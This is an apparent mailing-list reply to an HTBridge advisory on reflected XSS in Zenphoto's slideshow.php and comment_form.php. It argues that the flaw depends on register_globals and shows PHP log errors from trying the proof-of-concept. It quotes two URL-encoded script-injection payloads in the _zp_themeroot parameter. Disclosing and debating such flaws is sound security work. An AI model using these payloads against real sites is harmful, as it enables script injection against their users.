Re: HTB22945: Multiple XSS in ZENphoto
On Thu, 21 Apr 2011 at 13:42, advisory@htbridge.ch wrote:
> The vulnerability exists due to failure in the "/themes/zenpage/slideshow.php"
> script to properly sanitize user-supplied input in "_zp_themeroot"
> variable then register_globals is on.
You mean "if register_globals is on"? I thought anything
relying on register_globals was b0rked anyway?
Zenphoto lists "PHP 5.2+" as its requirements and "register_globals"
defauts to "off" since PHP 4.2.0.
That being said, the PoC generates some messages in the logs:
> http://[host]/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
PHP Notice: Undefined variable: _zp_themeroot in ../zenphoto/themes/zenpage/slideshow.php on line 9
PHP Fatal error: Call to undefined function zp_apply_filter() in ../zenphoto/themes/zenpage/slideshow.php on line 10
> http://[host]/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
PHP Notice: Undefined variable: _zp_themeroot in ../zenphoto/themes/stopdesign/comment_form.php on line 6
PHP Notice: Undefined variable: disabled in ../zenphoto/themes/stopdesign/comment_form.php on line 25
PHP Fatal error: Call to undefined function html_encode() in ../zenphoto/themes/stopdesign/comment_form.php on line 32
C.
--
BOFH excuse #160:
non-redundant fan failure
討論串 (同標題文章)